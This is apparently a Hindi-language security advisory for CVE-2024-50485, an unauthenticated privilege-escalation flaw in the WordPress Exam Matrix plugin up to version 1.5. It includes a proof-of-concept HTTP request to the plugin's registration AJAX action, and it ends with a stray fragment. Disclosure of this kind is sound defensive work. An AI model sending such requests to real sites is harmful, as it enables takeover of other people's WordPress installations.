
Exam Matrix <= 1.5 - अनधिकृत विशेषाधिकार वृद्धि
Exam Matrix <= 1.5 - अनधिकृत विशेषाधिकार वृद्धि
WordPress के लिए Exam Matrix प्लगइन संस्करण 1.5 तक (और इसमें शामिल) विशेषाधिकार वृद्धि के प्रति संवेदनशील है। यह प्लगइन द्वारा उचित रूप से कार्यक्षमता को प्रतिबंधित न करने के कारण है, जिससे अनधिकृत उपयोगकर्ता उच्च विशेषाधिकार भूमिका के रूप में पंजीकरण कर सकते हैं। यह अनधिकृत हमलावरों के लिए प्रशासनिक जैसे उच्च पहुँच विशेषाधिकार प्राप्त करना संभव बनाता है।
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50485
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: exam-matrix
यह आपको यहाँ एक उपयोगकर्ता के रूप में पंजीकरण करने देता है, भूमिका बदलने का कोई विकल्प नहीं है।
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/plugins.php?plugin_status=all&paged=1&s
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 133
Origin: http://kubernetes.docker.internal
Connection: keep-alive
action=register_action&username=admin2&[email protected]&firname=John&lasname=Doe&address=123%20Main%20St&passwrd=securepassword
goToImageUpload